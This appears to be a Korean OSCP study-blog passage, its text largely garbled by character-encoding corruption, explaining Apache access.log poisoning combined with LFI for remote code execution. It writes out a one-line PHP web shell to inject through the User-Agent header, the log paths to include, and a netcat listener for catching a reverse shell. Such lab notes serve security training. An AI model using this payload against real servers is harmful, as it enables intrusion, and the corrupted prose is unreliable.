access.log ν¬μ΄μ¦λ(μ€μΌ)
User-Agent ν€λμ νμ€ μ§λ¦¬ μΉμ μ½λλ₯Ό λ£λλ€. <?php echo system($_GET['cmd']); ?> μ΄ν μλ²λ‘ λΆν° μμ²μ΄ κ°κ² λλ©΄ μλ² μΈ‘μ μνμΉ λ‘κ·Έ νμΌμΈ /var/log/apache2/access.log(μλμ° μμ: C:\xampp\apache\logs\access.log)μλ μ¬μ©μμ λ°©λ¬Έ μ 보(μμ΄νΌ μ£Όμ, κ²½λ‘, User-Agent)κ° λ¨κ² λλ€.
μ΄μ LFI μ·¨μ½μ μ΄ μλ νλΌλ―Έν°μλ€ /var/log/apache2/access.logλ₯Ό μ λ ₯μ ν΄ νμΌμ μ½μ΄ μ€κ² λλ©΄μ ν΄λΉ PHP μ½λκ° μ€νλλ©΄μ μ격 μ½λ μ€ν μ·¨μ½μ΄ λ°μνλ€. (*cmd νλΌλ―Έν° μμλ ?κ° μλ &μ΄ μ¬ κ²)
nc -nvlp 4444
μ’ λ μνν μ μ΄λ₯Ό μν κ²½μ° κ³΅κ²©μλ 리λ²μ€μμ μ΄μ΄ λμ μλ²κ° μ°κ²°μ μμ²νκ²λ ν μλ μλ€.
μ΄ λ GET λ°©μμΈ κ²½μ° λͺ λ Ήμ΄ λ΄μ©μ URL μΈμ½λ©μ΄ μΆκ°μ μΌλ‘ νμλ‘ νλ€.
'π΄CTF > OSCP' μΉ΄ν κ³ λ¦¬μ λ€λ₯Έ κΈ
OSCP - 9.2.2. PHP Wrappers (0) | 2025.07.21 |
---|---|
OSCP - 9.1. Directory Traversal, Labs CVE-2021-43 --path-as-is μ·¨μ½μ (0) | 2025.07.21 |